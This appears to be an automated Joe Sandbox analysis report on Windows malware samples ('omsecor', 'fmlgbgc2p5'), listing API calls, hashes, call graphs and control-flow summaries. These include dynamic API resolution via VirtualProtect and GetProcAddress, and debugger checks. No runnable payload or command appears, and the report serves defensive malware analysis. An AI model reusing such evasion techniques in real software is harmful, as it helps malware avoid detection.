                          • String ID:
                          • API String ID: 2335467167-0
                          • Opcode ID: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                          • Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
                          • Opcode Fuzzy Hash: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                          • Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: -
                          • API String ID: 885266447-2547889144
                          • Opcode ID: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                          • Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
                          • Opcode Fuzzy Hash: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                          • Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE

                          Execution Graph

                          Execution Coverage: 3.1%
                          Dynamic/Decrypted Code Coverage: 0.3%
                          Signature Coverage: 0%
                          Total number of Nodes: 1163
                          Total number of Limit Nodes: 12
                          execution_graph: interactive call-graph rendering (node addresses, function names and API calls with edges between nodes); the flattened node/edge listing of this graph is not reproduced here.
4481->4484 4483 403ad5 4483->4450 4484->4483 4486 403ae6 4485->4486 4492 403b33 4485->4492 4487 401d3d __setmbcp 67 API calls 4486->4487 4488 403aeb 4487->4488 4489 403b13 4488->4489 4493 4037af 4488->4493 4491 403a33 __setmbcp 69 API calls 4489->4491 4489->4492 4491->4492 4492->4464 4492->4465 4494 4037bb _raise 4493->4494 4495 401d3d __setmbcp 67 API calls 4494->4495 4496 4037c0 4495->4496 4497 4037ee 4496->4497 4499 4037d2 4496->4499 4498 4034ee __lock 67 API calls 4497->4498 4500 4037f5 4498->4500 4501 401d3d __setmbcp 67 API calls 4499->4501 4508 403771 4500->4508 4503 4037d7 4501->4503 4506 4037e5 _raise 4503->4506 4507 402149 __amsg_exit 67 API calls 4503->4507 4506->4489 4507->4506 4509 403775 4508->4509 4510 4037a7 4508->4510 4509->4510 4511 40365f ___addlocaleref 8 API calls 4509->4511 4516 403819 4510->4516 4512 403788 4511->4512 4512->4510 4513 4036e5 ___removelocaleref 8 API calls 4512->4513 4514 403793 4513->4514 4514->4510 4515 40351f ___freetlocinfo 67 API calls 4514->4515 4515->4510 4519 403416 RtlLeaveCriticalSection 4516->4519 4518 403820 4518->4503 4519->4518 4521 4038e0 _memset 4520->4521 4522 403989 4520->4522 4530 406192 4521->4530 4526 401662 __invoke_watson 5 API calls 4522->4526 4528 403a2b 4526->4528 4528->4477 4529 4065c2 ___crtLCMapStringA 102 API calls 4529->4522 4531 403ad7 _LocaleUpdate::_LocaleUpdate 77 API calls 4530->4531 4532 4061a3 4531->4532 4540 405fda 4532->4540 4535 4065c2 4536 403ad7 _LocaleUpdate::_LocaleUpdate 77 API calls 4535->4536 4537 4065d3 4536->4537 4618 406220 4537->4618 4541 406024 4540->4541 4542 405ff9 GetStringTypeW 4540->4542 4543 40610b 4541->4543 4544 406011 4541->4544 4542->4544 4545 406019 GetLastError 4542->4545 4568 406e83 GetLocaleInfoA 4543->4568 4546 40605d MultiByteToWideChar 4544->4546 4563 406105 4544->4563 4545->4541 4552 40608a 4546->4552 4546->4563 4549 401662 __invoke_watson 5 API calls 4550 403944 4549->4550 4550->4535 4551 40615c GetStringTypeA 4555 406177 4551->4555 4551->4563 4556 40609f 
_memset __alloca_probe_16 4552->4556 4557 406654 _malloc 67 API calls 4552->4557 4554 4060d8 MultiByteToWideChar 4559 4060ee GetStringTypeW 4554->4559 4560 4060ff 4554->4560 4561 403f64 __mtinitlocknum 67 API calls 4555->4561 4556->4554 4556->4563 4557->4556 4559->4560 4564 405ef0 4560->4564 4561->4563 4563->4549 4565 405f09 4564->4565 4566 405ef8 4564->4566 4565->4563 4566->4565 4567 403f64 __mtinitlocknum 67 API calls 4566->4567 4567->4565 4569 406eb4 4568->4569 4570 406eaf 4568->4570 4599 406e72 4569->4599 4572 401662 __invoke_watson 5 API calls 4570->4572 4573 40612f 4572->4573 4573->4551 4573->4563 4574 406eca 4573->4574 4575 406f08 GetCPInfo 4574->4575 4579 406f92 4574->4579 4576 406f7d MultiByteToWideChar 4575->4576 4577 406f1f 4575->4577 4576->4579 4581 406f38 _strlen 4576->4581 4577->4576 4580 406f25 GetCPInfo 4577->4580 4578 401662 __invoke_watson 5 API calls 4582 406150 4578->4582 4579->4578 4580->4576 4583 406f32 4580->4583 4584 406f6a _memset __alloca_probe_16 4581->4584 4585 406654 _malloc 67 API calls 4581->4585 4582->4551 4582->4563 4583->4576 4583->4581 4584->4579 4586 406fc7 MultiByteToWideChar 4584->4586 4585->4584 4587 406ffe 4586->4587 4588 406fdf 4586->4588 4589 405ef0 __freea 67 API calls 4587->4589 4590 407003 4588->4590 4591 406fe6 WideCharToMultiByte 4588->4591 4589->4579 4592 407022 4590->4592 4593 40700e WideCharToMultiByte 4590->4593 4591->4587 4594 404032 __calloc_crt 67 API calls 4592->4594 4593->4587 4593->4592 4595 40702a 4594->4595 4595->4587 4596 407033 WideCharToMultiByte 4595->4596 4596->4587 4597 407045 4596->4597 4598 403f64 __mtinitlocknum 67 API calls 4597->4598 4598->4587 4602 407396 4599->4602 4603 4073ad 4602->4603 4606 40716b 4603->4606 4607 403ad7 _LocaleUpdate::_LocaleUpdate 77 API calls 4606->4607 4610 40717e 4607->4610 4608 407190 4609 40427c strtoxl 67 API calls 4608->4609 4611 407195 4609->4611 4610->4608 4614 4071cd 4610->4614 4612 40421d strtoxl 67 API calls 4611->4612 4617 406e7f 4612->4617 4613 40707c 
__isctype_l 91 API calls 4613->4614 4614->4613 4615 407212 4614->4615 4616 40427c strtoxl 67 API calls 4615->4616 4615->4617 4616->4617 4617->4570 4619 40623f LCMapStringW 4618->4619 4623 40625a 4618->4623 4620 406262 GetLastError 4619->4620 4619->4623 4620->4623 4621 406457 4625 406e83 ___ansicp 91 API calls 4621->4625 4622 4062b4 4624 4062cd MultiByteToWideChar 4622->4624 4647 40644e 4622->4647 4623->4621 4623->4622 4633 4062fa 4624->4633 4624->4647 4627 40647f 4625->4627 4626 401662 __invoke_watson 5 API calls 4628 403964 4626->4628 4629 406573 LCMapStringA 4627->4629 4630 406498 4627->4630 4627->4647 4628->4529 4664 4064cf 4629->4664 4631 406eca ___convertcp 74 API calls 4630->4631 4635 4064aa 4631->4635 4632 40634b MultiByteToWideChar 4636 406364 LCMapStringW 4632->4636 4658 406445 4632->4658 4634 406654 _malloc 67 API calls 4633->4634 4642 406313 __alloca_probe_16 4633->4642 4634->4642 4638 4064b4 LCMapStringA 4635->4638 4635->4647 4640 406385 4636->4640 4636->4658 4637 40659a 4644 403f64 __mtinitlocknum 67 API calls 4637->4644 4637->4647 4650 4064d6 4638->4650 4638->4664 4639 405ef0 __freea 67 API calls 4639->4647 4643 40638d 4640->4643 4649 4063b6 4640->4649 4641 403f64 __mtinitlocknum 67 API calls 4641->4637 4642->4632 4642->4647 4648 40639f LCMapStringW 4643->4648 4643->4658 4644->4647 4645 4064e7 _memset __alloca_probe_16 4657 406525 LCMapStringA 4645->4657 4645->4664 4646 4063d1 __alloca_probe_16 4651 406405 LCMapStringW 4646->4651 4646->4658 4647->4626 4648->4658 4649->4646 4652 406654 _malloc 67 API calls 4649->4652 4650->4645 4653 406654 _malloc 67 API calls 4650->4653 4654 40641d WideCharToMultiByte 4651->4654 4655 40643f 4651->4655 4652->4646 4653->4645 4654->4655 4656 405ef0 __freea 67 API calls 4655->4656 4656->4658 4659 406541 4657->4659 4660 406545 4657->4660 4658->4639 4663 405ef0 __freea 67 API calls 4659->4663 4662 406eca ___convertcp 74 API calls 4660->4662 4662->4659 4663->4664 4664->4637 4664->4641 4665->4480 4669 404c76 4666->4669 4670 
403ad7 _LocaleUpdate::_LocaleUpdate 77 API calls 4669->4670 4671 404c87 4670->4671 4671->4410 4672 406bf0 RtlUnwind 4673 4040f1 4674 4040f4 4673->4674 4677 406a50 4674->4677 4678 406a75 4677->4678 4679 406a7c 4677->4679 4680 402465 __FF_MSGBANNER 67 API calls 4678->4680 4689 404578 4679->4689 4680->4679 4683 406a8d _memset 4685 406b3b 4683->4685 4688 406b10 SetUnhandledExceptionFilter UnhandledExceptionFilter 4683->4688 4713 4023ea 4685->4713 4688->4685 4690 401b21 _raise 67 API calls 4689->4690 4691 404583 4690->4691 4691->4683 4692 404585 4691->4692 4694 404591 _raise 4692->4694 4693 4045ed 4696 4045ce 4693->4696 4699 4045fc 4693->4699 4694->4693 4695 4045b8 4694->4695 4694->4696 4701 4045b4 4694->4701 4697 401cc6 _raise 67 API calls 4695->4697 4698 401b21 _raise 67 API calls 4696->4698 4702 4045bd _siglookup 4697->4702 4698->4702 4700 40427c strtoxl 67 API calls 4699->4700 4703 404601 4700->4703 4701->4695 4701->4699 4705 404663 4702->4705 4706 4023ea _raise 67 API calls 4702->4706 4707 4045c6 _raise 4702->4707 4704 40421d strtoxl 67 API calls 4703->4704 4704->4707 4708 4034ee __lock 67 API calls 4705->4708 4709 40466e 4705->4709 4706->4705 4707->4683 4708->4709 4710 401b18 _raise 67 API calls 4709->4710 4711 4046a3 4709->4711 4710->4711 4716 4046f9 4711->4716 4714 4022f7 _raise 67 API calls 4713->4714 4715 4023f7 4714->4715 4717 404706 4716->4717 4718 4046ff 4716->4718 4717->4707 4720 403416 RtlLeaveCriticalSection 4718->4720 4720->4717 4721 401e76 GetModuleHandleA 4722 401e91 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4721->4722 4723 401e88 4721->4723 4725 401edb TlsAlloc 4722->4725 4754 401bca 4723->4754 4728 401ff5 4725->4728 4729 401f29 TlsSetValue 4725->4729 4729->4728 4730 401f3a 4729->4730 4765 402419 4730->4765 4733 401aaa __init_pointers 67 API calls 4734 401f4a 4733->4734 4735 401aaa __init_pointers 67 API calls 4734->4735 4736 401f5a 4735->4736 4737 401aaa __init_pointers 67 API calls 4736->4737 4738 401f6a 4737->4738 4739 401aaa 
__init_pointers 67 API calls 4738->4739 4740 401f7a 4739->4740 4772 403378 4740->4772 4743 401ff0 4744 401bca __mtterm 70 API calls 4743->4744 4744->4728 4745 401b21 _raise 67 API calls 4746 401f9b 4745->4746 4746->4743 4747 404032 __calloc_crt 67 API calls 4746->4747 4748 401fb4 4747->4748 4748->4743 4749 401b21 _raise 67 API calls 4748->4749 4750 401fce 4749->4750 4750->4743 4751 401fd5 4750->4751 4752 401c07 _raise 67 API calls 4751->4752 4753 401fdd GetCurrentThreadId 4752->4753 4753->4728 4755 401bd4 4754->4755 4756 401be0 4754->4756 4758 401b21 _raise 67 API calls 4755->4758 4757 401bf4 TlsFree 4756->4757 4759 401c02 4756->4759 4757->4759 4758->4756 4760 4033db RtlDeleteCriticalSection 4759->4760 4761 4033f3 4759->4761 4762 403f64 __mtinitlocknum 67 API calls 4760->4762 4763 403405 RtlDeleteCriticalSection 4761->4763 4764 401e8d 4761->4764 4762->4759 4763->4761 4766 401b18 _raise 67 API calls 4765->4766 4767 40241f __init_pointers 4766->4767 4776 404106 4767->4776 4770 401aaa __init_pointers 67 API calls 4771 401f3f 4770->4771 4771->4733 4775 403381 4772->4775 4773 404763 ___crtInitCritSecAndSpinCount 67 API calls 4773->4775 4774 401f87 4774->4743 4774->4745 4775->4773 4775->4774 4777 401aaa __init_pointers 67 API calls 4776->4777 4778 402451 4777->4778 4778->4770 4779 401877 4780 401886 4779->4780 4781 40188c 4779->4781 4782 4023ea _raise 67 API calls 4780->4782 4785 40240a 4781->4785 4782->4781 4784 401891 _raise 4786 4022f7 _raise 67 API calls 4785->4786 4787 402415 4786->4787 4787->4784 4788 4027fa 4789 402807 4788->4789 4792 40280c _strlen 4788->4792 4791 403f46 ___initmbctable 111 API calls 4789->4791 4790 402818 4791->4792 4792->4790 4793 404032 __calloc_crt 67 API calls 4792->4793 4794 40283f _strlen 4793->4794 4794->4790 4795 40289a 4794->4795 4797 404032 __calloc_crt 67 API calls 4794->4797 4798 4028bf 4794->4798 4800 404bcb _strcpy_s 67 API calls 4794->4800 4801 404121 __invoke_watson 10 API calls 4794->4801 4796 403f64 __mtinitlocknum 67 API calls 
4795->4796 4796->4790 4797->4794 4799 403f64 __mtinitlocknum 67 API calls 4798->4799 4799->4790 4800->4794 4801->4794 4802 4023fb 4803 4022f7 _raise 67 API calls 4802->4803 4804 402406 4803->4804 4887 40213b SetUnhandledExceptionFilter 3992 402f3e HeapCreate 3993 402f61 3992->3993 3994 402f5e 3992->3994 4001 402ee3 3993->4001 3997 402f94 4000 402f7f HeapDestroy 4000->3994 4002 4021f2 ___crtInitCritSecAndSpinCount 67 API calls 4001->4002 4003 402efa 4002->4003 4004 402f09 4003->4004 4005 404121 __invoke_watson 10 API calls 4003->4005 4006 402229 __FF_MSGBANNER 67 API calls 4004->4006 4005->4004 4007 402f15 4006->4007 4008 402f24 4007->4008 4009 404121 __invoke_watson 10 API calls 4007->4009 4008->3997 4010 405045 RtlAllocateHeap 4008->4010 4009->4008 4011 402f7a 4010->4011 4011->3997 4011->4000 4805 4020fe 4806 402136 4805->4806 4808 40210c 4805->4808 4808->4806 4809 4040cd 4808->4809 4810 4040d9 _raise 4809->4810 4811 401d3d __setmbcp 67 API calls 4810->4811 4813 4040de 4811->4813 4812 406a50 _abort 69 API calls 4814 404100 _raise 4812->4814 4813->4812 4814->4806

                          Control-flow Graph

                          control_flow_graph 90 4012c0-4012e8 FindFirstFileA call 401080
                          APIs
                          • FindFirstFileA.KERNELBASE(ks clku .d,E51E2AD4), ref: 004012DD
                            • Part of subcall function 00401080: GetTickCount.KERNEL32 ref: 00401096
                            • Part of subcall function 00401080: GetDesktopWindow.USER32 ref: 004010B8
                            • Part of subcall function 00401080: GetClassNameA.USER32(00000000,00000000,00000400), ref: 004010CC
                            • Part of subcall function 00401080: GlobalAlloc.KERNELBASE(00000000,000F6950), ref: 004010EE
                            • Part of subcall function 00401080: GetCurrentProcess.KERNEL32(?), ref: 0040114B
                            • Part of subcall function 00401080: GetProcessIoCounters.KERNEL32(00000000), ref: 0040114E
                            • Part of subcall function 00401080: GetCurrentProcess.KERNEL32(?,?,?,?), ref: 004011B9
                            • Part of subcall function 00401080: GetProcessTimes.KERNELBASE(00000000), ref: 004011BC
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Process$Current$AllocClassCountCountersDesktopFileFindFirstGlobalNameTickTimesWindow
                          • String ID: ks clku .d
                          • API String ID: 973805369-4096487313
                          • Opcode ID: f572dfb4ccbad4a63051ea1b90dc6402510860d94203dc7c9fb76134c3d65c66
                          • Instruction ID: 8201e92c16030f82e268503128fd01f75d7624b5287a074f0a6a6b49dcde2be8
                          • Opcode Fuzzy Hash: f572dfb4ccbad4a63051ea1b90dc6402510860d94203dc7c9fb76134c3d65c66
                          • Instruction Fuzzy Hash: 13C012701042448FC330AF24DE0ABAA37E4AB48300F00093AA5E8E60A4DA3455598A8A

                          Control-flow Graph

                          APIs
                          • GetTickCount.KERNEL32 ref: 00401096
                          • GetDesktopWindow.USER32 ref: 004010B8
                          • GetClassNameA.USER32(00000000,00000000,00000400), ref: 004010CC
                          • GlobalAlloc.KERNELBASE(00000000,000F6950), ref: 004010EE
                          • GetCurrentProcess.KERNEL32(?), ref: 0040114B
                          • GetProcessIoCounters.KERNEL32(00000000), ref: 0040114E
                          • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 004011B9
                          • GetProcessTimes.KERNELBASE(00000000), ref: 004011BC
                          Strings
                          • cjkU dklu UUido c;aopi quio ,mvnciu cxklnsp, xrefs: 00401131
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Process$Current$AllocClassCountCountersDesktopGlobalNameTickTimesWindow
                          • String ID: cjkU dklu UUido c;aopi quio ,mvnciu cxklnsp
                          • API String ID: 509927810-2920797944
                          • Opcode ID: e0b8abb97aa25d1df5e5a951dd4f26f151847d18626d26f9063e3e0a3aa5dc8f
                          • Instruction ID: 30898c1c04428891cb82ceb7e239a2b08516cd6c9376f1465321758e23d54b14
                          • Opcode Fuzzy Hash: e0b8abb97aa25d1df5e5a951dd4f26f151847d18626d26f9063e3e0a3aa5dc8f
                          • Instruction Fuzzy Hash: E55127F1D041744BDB288B298D54BB9BBF5ABC5305F0881BEE689B7381D5385A48CF28

                          Control-flow Graph

                          control_flow_graph 17 407a98-407a9f GetModuleHandleA 18 407aa1-407ab0 call 407ab5 17->18 19 407adf 17->19 29 407ab2-407abd GetProcAddress 18->29 30 407b17 18->30 20 407ae1-407ae5 19->20 22 407b24 call 407b29 20->22 23 407ae7-407aef GetModuleHandleA 20->23 26 407af1-407af9 23->26 26->26 28 407afb-407afe 26->28 28->20 31 407b00-407b02 28->31 29->19 33 407abf-407acc VirtualProtect 29->33 32 407b18-407b20 30->32 36 407b04-407b06 31->36 37 407b08-407b10 31->37 41 407b22 32->41 34 407ade 33->34 35 407ace-407adc VirtualProtect 33->35 34->19 35->34 39 407b11-407b12 GetProcAddress 36->39 37->39 39->30 41->28
                          APIs
                          • GetModuleHandleA.KERNEL32(00407A8F), ref: 00407A98
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                            • Part of subcall function 00407AB5: GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                            • Part of subcall function 00407AB5: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                            • Part of subcall function 00407AB5: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction ID: 53099f65029657388ac4b193d9ffb221688749bb3c6439a8311ebbe5e3b7996f
                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction Fuzzy Hash: B501CC00F4D24539DA2051754C0197F7AA89A533687141677A111B72D3D9BCBE0692BF

                          Control-flow Graph

                          control_flow_graph 42 407a59-407a6e 43 407a70-407a78 42->43 44 407adf 42->44 43->44 46 407a7a-407aa8 call 407a98 43->46 45 407ae1-407ae5 44->45 47 407b24 call 407b29 45->47 48 407ae7-407aef GetModuleHandleA 45->48 54 407aaa 46->54 55 407b1e-407b20 46->55 51 407af1-407af9 48->51 51->51 53 407afb-407afe 51->53 53->45 56 407b00-407b02 53->56 57 407aac-407ab0 54->57 58 407b0d-407b10 54->58 59 407b22 55->59 60 407b18-407b1d 55->60 61 407b04-407b06 56->61 62 407b08-407b0c 56->62 65 407b17 57->65 66 407ab2-407abd GetProcAddress 57->66 63 407b11-407b12 GetProcAddress 58->63 59->53 60->55 61->63 62->58 63->65 65->60 66->44 67 407abf-407acc VirtualProtect 66->67 68 407ade 67->68 69 407ace-407adc VirtualProtect 67->69 68->44 69->68
                          APIs
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                            • Part of subcall function 00407A98: GetModuleHandleA.KERNEL32(00407A8F), ref: 00407A98
                            • Part of subcall function 00407A98: GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                            • Part of subcall function 00407A98: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                            • Part of subcall function 00407A98: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction ID: 8932c9a1b40894ead954c0166dfb712feb6fdadac19e13bdf209ed336a7ac0e8
                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction Fuzzy Hash: DE21F621A4D2416EEB2186B44C0166B7BE49B13368F1946A7D141EB2C3D1BC7D4687AB

                          Control-flow Graph

                          control_flow_graph 70 407ab5-407abd GetProcAddress 71 407adf 70->71 72 407abf-407acc VirtualProtect 70->72 75 407ae1-407ae5 71->75 73 407ade 72->73 74 407ace-407adc VirtualProtect 72->74 73->71 74->73 76 407b24 call 407b29 75->76 77 407ae7-407aef GetModuleHandleA 75->77 79 407af1-407af9 77->79 79->79 80 407afb-407afe 79->80 80->75 81 407b00-407b02 80->81 82 407b04-407b06 81->82 83 407b08-407b10 81->83 84 407b11-407b17 GetProcAddress 82->84 83->84 87 407b18-407b20 84->87 89 407b22 87->89 89->80
                          APIs
                          • GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProcProtectVirtual$HandleModule
                          • String ID:
                          • API String ID: 2152742572-0
                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction ID: 39b30828dda2cca0c429c80848ec8113aa03dbdf6ed959677c669bf53de2d5ad
                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction Fuzzy Hash: 98F0F400E8D2043CEE2151B40C01ABBBBEC86633687241A27A211E72C3D4BC7E0692BB

                          Control-flow Graph

                          control_flow_graph 93 402f3e-402f5c HeapCreate 94 402f61-402f6e call 402ee3 93->94 95 402f5e-402f60 93->95 98 402f70-402f7d call 405045 94->98 99 402f94-402f97 94->99 98->99 102 402f7f-402f92 HeapDestroy 98->102 102->95
                          APIs
                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,004017AC,00000001), ref: 00402F4F
                          • HeapDestroy.KERNEL32 ref: 00402F85
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$CreateDestroy
                          • String ID:
                          • API String ID: 3296620671-0
                          • Opcode ID: 7bbac67fe878dc3ebcdb7e33c34032945d00a98356e3978511e20ae8c663db98
                          • Instruction ID: 98ebcd61208b82bef51758d9ec37e8992e6abd11400b15b10fa3614edeb5f36b
                          • Opcode Fuzzy Hash: 7bbac67fe878dc3ebcdb7e33c34032945d00a98356e3978511e20ae8c663db98
                          • Instruction Fuzzy Hash: D3E092706643029EEB40AB31AF0D72636E4E74078AF10843BF548F51E2EBBC8605AF4C
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 004020B3
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004020C8
                          • UnhandledExceptionFilter.KERNEL32(00408204), ref: 004020D3
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 004020EF
                          • TerminateProcess.KERNEL32(00000000), ref: 004020F6
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: bf9e4dc40609aede9a22b05b14043da035278ae7b0f51125174d724f9b36215e
                          • Instruction ID: b20ca496c67c0111f9bdb02fdd2caa8760b953d18a2e8655b2b95bf976f6fc72
                          • Opcode Fuzzy Hash: bf9e4dc40609aede9a22b05b14043da035278ae7b0f51125174d724f9b36215e
                          • Instruction Fuzzy Hash: 5321AEB5950304DFC710EF24EF48A453BB5BF88306F10403AE549B36A1E7B859A59F9E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 103 402465-40246f 104 402471-402478 103->104 105 402480-402483 104->105 106 40247a-40247e 104->106 107 402600-402604 105->107 108 402489-402495 call 404c30 105->108 106->104 106->105 111 40249b-4024a5 call 404c30 108->111 112 4025cc-4025d8 GetStdHandle 108->112 118 4024b4-4024ba 111->118 119 4024a7-4024ae 111->119 114 4025da-4025dd 112->114 115 4025ff 112->115 114->115 117 4025df-4025f9 call 404b40 WriteFile 114->117 115->107 117->115 118->115 122 4024c0-4024db call 404bcb 118->122 119->112 119->118 125 4024ea-402506 GetModuleFileNameA 122->125 126 4024dd-4024e7 call 404121 122->126 128 402508-40251d call 404bcb 125->128 129 40252e-402539 call 404b40 125->129 126->125 128->129 137 40251f-40252b call 404121 128->137 135 402573 129->135 136 40253b-402560 call 404b40 call 404a82 129->136 139 402575-402586 call 404a11 135->139 136->135 151 402562-402571 call 404121 136->151 137->129 146 402595-4025a8 call 404a11 139->146 147 402588-402592 call 404121 139->147 155 4025b7-4025ca call 404854 146->155 156 4025aa-4025b4 call 404121 146->156 147->146 151->139 155->115 156->155
                          APIs
                          • _strcpy_s.LIBCMT ref: 004024D1
                          • __invoke_watson.LIBCMT ref: 004024E2
                          • GetModuleFileNameA.KERNEL32(00000000,0040B091,00000104), ref: 004024FE
                          • _strcpy_s.LIBCMT ref: 00402513
                          • __invoke_watson.LIBCMT ref: 00402526
                          • _strlen.LIBCMT ref: 0040252F
